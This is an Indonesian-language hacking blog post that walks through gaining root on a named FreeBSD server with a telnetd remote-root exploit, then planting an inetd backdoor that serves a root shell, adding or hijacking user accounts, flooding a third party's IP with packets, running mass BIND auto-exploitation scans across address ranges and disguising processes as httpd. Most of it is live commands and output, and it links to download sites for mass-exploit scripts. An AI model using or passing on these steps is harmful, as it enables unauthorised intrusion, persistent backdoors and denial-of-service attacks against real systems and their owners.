mp3 Player

Efek klik kanan

Rabu, 30 Maret 2016

Hacking Root dan Pembuatan Backdoor 

                                                                                                    
 - hey hey hey para pengguna scriptz, mungkinz kalianz sudah terbiasa dalam hal mendapatkan  akses setingkat root di box online yang kalianz attact, dan pasti untuk membawa nama comunity atau nama sendiri kalian coba untuk melakukan defacing. ehmm...udah puaskah hanya denganz defacing doang..?? no i don't think so..uh !! mungkin aku ndiri dulu suka banget yang namanya defacing, truz di kabarkan kemana-mana kalo kita berhasil breaking security box online tersebut.

Tapi aku pengen curhatz dikitz keisengan aku saat ngedapetinz box online. Sekarang aku pengenz coba make scriptz yang ada, misal coba ke box bsd ajah yah, ambil contoh free-bsd, inih misal loh, janganz protez kalo yang ngerasa hal inih menjijikanz mah yah...pliz pliz pliz...

Alat yang bisa di siapkan :

1. shell-unix kalianz.
2. script buat attackingnyah, dalam hal inih aku coba telnetd-bsd.c
3. marlboro light, bagi kalianz yang merokok. Haruz marlboro light, hehehe... *kiddingz*
4. coklatz cadburyz, es milo, mp3-player, MIrc-clientz, Yahoo-messenger... hihihi buatz ngilanginz suntukz ajah kok.
5. your brain ofcourse.

Ok pas kita dapet target, kita coba test apakah mreka vulnerable atau tidak dengan cara sbb:

[root@purepero .bash]# ./FAKE httpd ./tel -c ns.kuaiqu.com 7350854 - x86/bsd telnetd remote root by zip, lorian, smiler and scut.
check: PASSED, using 16mb mode


Ternyata vulner euy..hihihi, kita coba breaking ajah yukz pake brute force..!!

[root@purepero .bash]# ./FAKE httpd ./tel -f ns.kuaiqu.com 7350854 - x86/bsd telnetd remote root by zip, lorian, smiler and scut.
check: PASSED, using 16mb mode

#################################

ok baby, times are rough, we send 16mb traffic to the remote telnet daemon process, it will spill badly. but then, there is no other way, sorry...




## setting populators to populate heap address space
## number of setenvs (dots / network): 31500
## number of walks (percentage / cpu): 496140750
##
## the percentage is more realistic than the dots ;)
percent |--------------------------------------------------------| ETA |

99.37% |....................................................... | 00:00:16 | ## sleeping for 10 seconds to let the process recover ## ok, you should now have a root shell ## as always, after hard times, there is a reward...

command: ÿý%uname -a ; id ; hostname

FreeBSD ns.kuaiqu.com 4.2-RELEASE FreeBSD 4.2-RELEASE #0: Thu Dec 21 23:24:49 CST 2000 awa@ns.kuaiqu.com:/usr/src/sys/compile/KUAIQU i386

uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest) ns.kuaiqu.com




Hoooaaammmm.... akhirnyah nembuz juga dah.. mo deface? hihihihi, ah nakalz banget seeh, kita coba cara yang jahatz yuk ..!! kita bikinz backdoor ajah duluw. Oh iya, aku coba pake backdoor port ajah, walau gak smua comand shell bisa di lakukan, tapi untuk ngejalanin script-script nakalz bisa kok...

isengz bikinz backdoor :



ps ax | grep inetd
ps: warning: /var/run/dev.db: No such file or directory
135 ?? Is 0:02.24 inetd -wW
72448 ?? Is 0:00.29 /usr/sbin/inetd -wW
79721 ?? Is 0:00.27 /usr/sbin/inetd --help
echo "semutz 12342/tcp" >> /etc/services
echo "dial stream tcp nowait root /bin/sh sh -i" >> /etc/inetd.conf kill -HUP 135



wah dah jadi dah backdoor kita, coba ajah skarangz telnet ke target sesuai port yang kalianz add tadi, yaitu port 12342. Nama service ama port bisa kalianz ganti sesuai keinginanz kalianz kok. Oh iya, untuk upload file-file scriptz kalianz kan butuh user di box tersebut, kalo aku biasanyah adduser atawa ganti name user+passwd user yang udah ada..hihihi...
kalo mo adduser :

pw useradd -g whell -d /home/semutz -s /usr/local/bin/tcsh
atau

pw useradd semutz

kalo mo ganti name user+passwd-nyah :

pw usermod erica -l semutz

passwd semutz




Untuk lengkapnya coba baca manualnyah di /etc/adduser.conf ajah yah untuk free-bsd..hehe.. nah setelah selesai, buruan upload script/tool nakal kalianz ke user tadi, dan compile secepatnyah..[haruz kurangz dari 10 menit] kalo udah berharap sajah semoga user name yang kalianz add/ganti tadi gak di ketahui ama si empunya box.. kalo misalnyah terhapuz, kalianz masih bisa login lewat backdoor yang kalianz add tadi. Ok misal kalianz mo coba akses lewat backdoor, coba telnet ke backdoor yang di add tadi :

[root@purepero /]# telnet ns.kuaiqu.com 12342 Trying 202.106.127.106... Connected to ns.kuaiqu.com. Escape character is '^]'.
sh: can't access tty; job control turned off

# id ; uname -a ; hostname ;

uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest)

FreeBSD ns.kuaiqu.com 4.2-RELEASE FreeBSD 4.2-RELEASE #0: Thu Dec 21 23:24:49 CST 2000 awa@ns.kuaiqu.com:/usr/src/sys/compile/KUAIQU i386

ns.kuaiqu.com

: not found

#


dan skarangz coba ajah jalaninz script/tool nakal kalianz, misal ajah aku mo coba isengz kirim packet ke IP musuh...hihihi, btw aku gak cari musuh loh, inih

cumanz isengz doang kok.. aku coba jalankan ajah scriptz-nyah : # ./FAKE httpd ./tembak 202.95.156.178 ;

--------------------------------------------
packetkiddies eh??
--------------------------------------------

nya mana? ngga ada sasarannya tuh mas..

: not found
#
# ./FAKE httpd ./tembak -h 202.95.156.178 ;
--------------------------------------------
packetkiddies eh??
--------------------------------------------

SIAP!!!! PASUKANNNNN!!! TEMBAK 202.95.156.178 di port 22
SIAPIN pelornya 45

^C

#




nah udah launched deh paketnyah, kebetulan yang aku pake inih dia kirim 2 Mb tiap sending secara default, kecil kok, gak ngrusak..hihi..tapi yang barusan aku lakukan timing-nyah gak terhingga, jadi kirim secara terus menerus. Lalu coba deh ping IP tadi lewat dos atawa lewat shell unix kalianz, gimana hasilnyah? dan misal dia ada di IRC, liatz sajah quit msg dia...hihihi.. Oh iya, kalo udah selesey isengnyah tekan ajah Ctrl+c, hal inih berguna untuk menghindari packet yang berlebihan dan eksistensi rooted box kalianz. Ada juga script yang bisa sending seluruh bandwidth yang di punyai box online tersebut, kalianz bisa cari di internet banyak kok.

Mo coba jalaninz script lainnyah..?? bisa juga kok, coba ajah jalanin mass-attacking bind, statdx, lpd, atau wuftpd. yang mo aku coba skarangz mass-attacking bind deh :

# ./FAKE httpd ./luckscan-a --help ;
Usage: ./luckscan-a <a-block> <port> [b-block] [c-block]

: not found

# ./FAKE httpd ./luckscan-a 211 53 159 ;
We are trying to root the server 211.194.27.227
Version ...
Moving onto another server...
We are trying to root the server 211.194.44.230
Version ...
Moving onto another server...
We are trying to root the server 211.194.81.2
Version 8.1.2 ... frame ptr=0xbffff800 adr=bffff64e ofs=102 port=05f8 connected! sent!




nah pas kalianz dapatkan promt sepertih inih, coba tekan <enter> 2x lalu 'uname -a ; id ; hostname' apa yang kalianz lihatz ? hihihi... ya udah kerja lagih sanah, mo adduser, backdoor, rename user+passwd, defacing, eggdrop, psybnc atau yang laennyah terserah..hihihi.. kalo dah ngerasa puas di box baru inih, tekan sajah Ctrl+c, dan mass-attacking tadi jalan kembali sebagai mana mestinyah...

We are trying to root the server 211.194.119.2
Version ...
Moving onto another server...
We are trying to root the server 211.194.140.2
Version 8.2.3-REL ...
Moving onto another server...
We are trying to root the server 211.194.144.241
Version 8.1.2 ... system cannot be exploited
Moving onto another server...
We are trying to root the server 211.194.157.19
Version 8.2.2-P5 ... system does not seem to be a vulnerable linux Moving onto another server... We are trying to root the server 211.196.70.155 Version 8.1.2 ... frame ptr=0xbffffc00 adr=bffffa7e ofs=54 port=1043 connected! sent!




    hooaaammm...dapet lagih...sialanz, kerja lagih dah...hihihi.. Ok udah gituh dulu ajah, silakanz coba coba ajah sendiri. Oh iya, pasti ada yang tanya, kenap aku pake faked httpd buat jalaninz scriptz...hehehhe, soale ituh bukanz box aku, jadi kudu tersamarkan aktipitasku, kalo gak mah, bisa kena kill kita atau gak gak awet dah box-nyah.. Walah, kok malah ngajarinz nakalz yakz.. yang jelas inih artikelz harap di baca ama para admin ajah, kalo sebenernyah di box kalianz bisa terjadi apa sajah tanpa sepengetahuanz kalianz... *watch out*


daaaaagghhhh...

nb:

1. Moga ajah inih cuman sebagai teman ber-internet kalian ajah, jangan di coba kalo gak mau nanggung resiko yang gak kalianz ketahuinz nantinyah.. dan kerjakanz dalam waktu secepat mungkinz. 2. Usahakan selalu berbagi sebisa kalianz bagi yang dah perfect. 3. Bagi para admin, sering seringlah check keberadaan trafic box anda. 4. Tanda ';' harus di ikut sertakan pada saat kalianz akses lewat backdoor port.

5. Aku nyedia-inz script buat mass-attacking bind, mass-attacking statdx, ama mass-attacking lpd doangz, yang laennyah mohon maap sebelomnyah gak boleh di distribusikan, harap di mengerti.

6. Bagi yang mau tanya lebih lanjut bisa kalianz tanyakanz ke aku atawa anak anak di #indosniffing, kita sudah jarang defacing karena lebih menyukai mempelajari isi dari OS-nya, karena kemungkinan kecil instal OS-nya di kost makanyah aku belajar dari box online hasil isengz ajah..hihihi...

7. PALING PENTINGZ KALIANZ PELAJARINZ SELUK BELUK OS YANG KALIANZ MO ATTACK DULU, AGAR TIDAK KESUSAHAN PAS KALIANZ MENDAPATKAN BOX ONLINE YANG SECURITY-NYAH LEMAH !!!!!!!!!!

terimakasih aku buat:
- #indosniffing, kalianz bukanz hanya temanz chating, tapi kalianz nganggep smua keluarga dan gak ada beda, aku suka ituh.
- #indofreebsd, #indolinux, #deface-team, #b@yochatz, #britishroom, #jasakom #sunsolaris
- vokalisku yunni, marlboro light, cadburyz, aqua, mp3 list-ku, mba'ku [tanti, dinda, naddya, ayi, yuli], komputerku si kompi.
- yang jelaz smuanyah yang udah nemeninz aku sejak lahir ampe skarangz ini ...hihihi..kayak say thx di cover kaset yakz..
- makasih juga buatz *** Resolved 148.223.110.67 to customer-148-223-110-67.uninet.net.mx yang udah ngasih ijinz aku akses root di box anda ... hihihihi...

script mass-attacking bisa di lihatz di :

- http://www.rocketpunch-ent.com/masslpd.tar, http://www.rocketpunch-ent.com/bindscan.c, http://www.rocketpunch-ent.com/lucstatdx.c



0 komentar:

Posting Komentar